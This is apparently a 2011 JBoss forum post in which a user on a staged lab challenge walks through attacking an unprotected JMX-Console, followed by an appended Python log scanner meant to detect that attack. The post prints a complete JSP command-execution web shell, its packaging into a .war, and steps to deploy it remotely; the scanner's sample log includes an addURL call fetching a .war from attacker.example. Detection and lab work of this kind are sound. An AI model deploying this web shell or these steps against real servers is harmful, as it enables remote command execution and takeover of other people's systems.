0 Replies Latest reply on Jan 14, 2011 1:23 PM by lazers

    breaking jboss with a browser? not happening

    lazers

      I have been given the task of breaking into a JBoss application by my senior sec manager at my company.

      It's a hacking challenge staged in a test lab. This is what I have been given: web access to JBoss.

      Yes, that's pretty much it. He believes in a less-is-more philosophy, with some info to get started working.

      I have been told that a vulnerability exists in the application, and it's no 0-day exploit; it's a known vulnerability.

      It is set as an open-book challenge; I can get help anywhere I like. So what have I done so far?

      Yes, I googled; but I also ran a Nessus scan, and the scan brought me one HIGH vulnerability.

      It has to do with the default JBoss installation using the JMX-Console. It's not a new vulnerability;

      I was able to reach this conclusion as I started googling. This particular vulnerability is very popular.

      I was saying to myself that my problems were over and I would break into JBoss in record time.

      But that has been largely untrue. Why? Well, if it weren't true I wouldn't be here. I did the following (in steps):

       

      Attack vector: deployment scanner feature

      1. Confirmed the default installation (by accessing localhost:9090); in my case it's

      9090, not 8080 as in the hacking literature. Probably this is because I'm using a new version (I don't know the exact reason).

      2. I wrote this JSP script (cmd.jsp) as told on sites.

      <%@ page import="java.util.*,java.io.*"%>
      <%
      %>
      <HTML><BODY>
      Commands with JSP
      <FORM METHOD="GET" NAME="myform" ACTION="">
      <INPUT TYPE="text" NAME="cmd">
      <INPUT TYPE="submit" VALUE="Send">
      </FORM>
      <pre>
      <%
      if (request.getParameter("cmd") != null) {
          out.println("Command: " + request.getParameter("cmd") + "<BR>");
          Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
          OutputStream os = p.getOutputStream();
          InputStream in = p.getInputStream();
          DataInputStream dis = new DataInputStream(in);
          String disr = dis.readLine();
          while (disr != null) {
              out.println(disr);
              disr = dis.readLine();
          }
      }
      %>
      </pre>
      </BODY></HTML>

       

      3.next i create a web.xml file to be placed in WEB-INF folder

       

      <?xml version="1.0" ?>

      <web-app xmlns="http://java.sun.com/xml/ns/j2ee"

      xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"

      xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee

      http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd"

      version="2.4">

      <servlet>

      <servlet-name>Command</servlet-name>

      <jsp-file>/cmd.jsp</jsp-file>

      </servlet>

      </web-app>

       

      4. I compiled the file cmd.jsp by placing the web.xml file in the WEB-INF folder:

      jar cvf cmd.war WEB-INF cmd.jsp

      5. I put this file on an Apache HTTP server. The file cmd.war resides in the htdocs folder and can be accessed by the URL mywebserver:80/cmd.war

       

      6.i go back to jboss defualt page and navigate myself to jboss.deploymentpage.

       

      7. in the addurl tab i enter path for my cmd.war file as

      http://mywebserver/cmd.war

       

      8. next i goto victim webserver in attempt to access my uploaded application http://victim:9090/cmd/cmd.jsp

       

      9. i get HTTP STATUS 404- /cmd/cmd.jsp

       

      my app is suppose to be hot deployed by the jboss; but this is not the case coz even after 10-20 times after u have access the file i get the same error page. I want to know what is the reason for the behavior. I know there exists other attack vector (e.g rmi and etc) but i want to stick to this until i don't figure out the reason for this failure of exploit.

       

      Em i compiling the .jsp file with incorrect syntax? do i need to have tomcat server installed instead? I read it on internet that there could be some problems in the jboss trying to get reverse shell on your web-server as jboss is it work in bind-shell mode only? I'm really clueless to what i happening i spent 12 works on this single attack vector but em not making head-ways.

       

      jboss gurus help me.

       

      thanks
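The sequence the post walks through (browse the JMX console, invoke the deployment scanner's addURL operation with a remote .war, then request a JSP with a cmd parameter) leaves a distinctive trail in the servlet container's HTTP access log, which is what a defender monitoring a JBoss host would want to alert on. The script below is an added example, not part of the original post or of JBoss itself. It parses Apache/Tomcat combined-format access-log lines and flags three things: management-console requests that succeed without an authenticated user, console invocations whose query string carries deploy-style arguments (addURL, deploy, a .war URL), and .jsp requests carrying a cmd parameter. The log lines, IP addresses, timestamps, the MBean name and the exact query-string shape of the HtmlAdaptor invocation are constructed for this sample and should be treated as assumptions to tune against a real log.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample access-log lines (Apache/Tomcat combined format); not real traffic.
# The MBean name and HtmlAdaptor query shape are assumptions for the sample.
SAMPLE_LOG = """\
10.0.0.5 - - [14/Jan/2011:13:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.7 - - [14/Jan/2011:13:02:10 +0000] "GET /jmx-console/ HTTP/1.1" 200 8210 "-" "Mozilla/5.0"
10.0.0.7 - - [14/Jan/2011:13:02:45 +0000] "GET /jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.deployment:type=DeploymentScanner,flavor=URL HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
10.0.0.7 - - [14/Jan/2011:13:03:12 +0000] "POST /jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.deployment:type=DeploymentScanner,flavor=URL&methodName=addURL&argType=java.net.URL&arg0=http://attacker.example/cmd.war HTTP/1.1" 200 1250 "-" "Mozilla/5.0"
10.0.0.7 - - [14/Jan/2011:13:03:40 +0000] "GET /cmd/cmd.jsp?cmd=id HTTP/1.1" 404 1020 "-" "Mozilla/5.0"
10.0.0.9 - - [14/Jan/2011:13:05:00 +0000] "GET /jmx-console/ HTTP/1.1" 401 0 "-" "curl/7.21"
"""

# Combined log format: client, identd, authenticated user, timestamp, request line, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Management consoles shipped with a default JBoss install.
CONSOLE_PREFIXES = ("/jmx-console", "/web-console")
# Arguments that indicate code is being deployed through the console: the addURL
# operation the post uses, generic deploy verbs, or a .war URL. Tune as needed.
DEPLOY_HINTS = re.compile(r'(addURL|deploy|\.war\b)', re.IGNORECASE)


@dataclass
class Finding:
    ip: str
    ts: str
    severity: str
    reason: str
    target: str


def classify(line: str) -> Optional[Finding]:
    """Return a Finding for a suspicious access-log line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None  # not a combined-format line; skip rather than guess
    d = m.groupdict()
    status = int(d["status"])
    target = d["target"]
    path = target.split("?", 1)[0]
    authenticated = d["user"] != "-"

    if path.startswith(CONSOLE_PREFIXES):
        if status >= 400:
            return None  # rejected (401/403/404): the console is not exposed
        if "invokeOp" in target and DEPLOY_HINTS.search(target):
            sev, why = "high", "console operation that deploys remote code"
        elif not authenticated:
            sev, why = "medium", "management console served without authentication"
        else:
            sev, why = "low", "authenticated console access (review)"
        return Finding(d["ip"], d["ts"], sev, why, target)

    # A JSP taking a cmd parameter is the web-shell pattern from the post; a 404
    # still means someone tried it, so report it at lower severity.
    if path.endswith(".jsp") and re.search(r'[?&]cmd=', target):
        sev = "high" if status < 400 else "medium"
        return Finding(d["ip"], d["ts"], sev, "JSP requested with a cmd parameter", target)
    return None


def scan(log_text: str) -> List[Finding]:
    """Classify every line of an access log and keep the findings."""
    return [f for f in (classify(ln) for ln in log_text.splitlines()) if f]


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f.severity:6} {f.ip:10} {f.ts}  {f.reason}: {f.target}")
```

On the sample, the 401 from 10.0.0.9 is deliberately not a finding: an access-denied response on /jmx-console/ is what a hardened install looks like, and that is the fix this post's challenge is built around. In the JBoss 4.x/5.x branches I know, that hardening is done by enabling the security-constraint in the console's own WEB-INF/web.xml and its security-domain in WEB-INF/jboss-web.xml, and the same lines should be checked for /web-console.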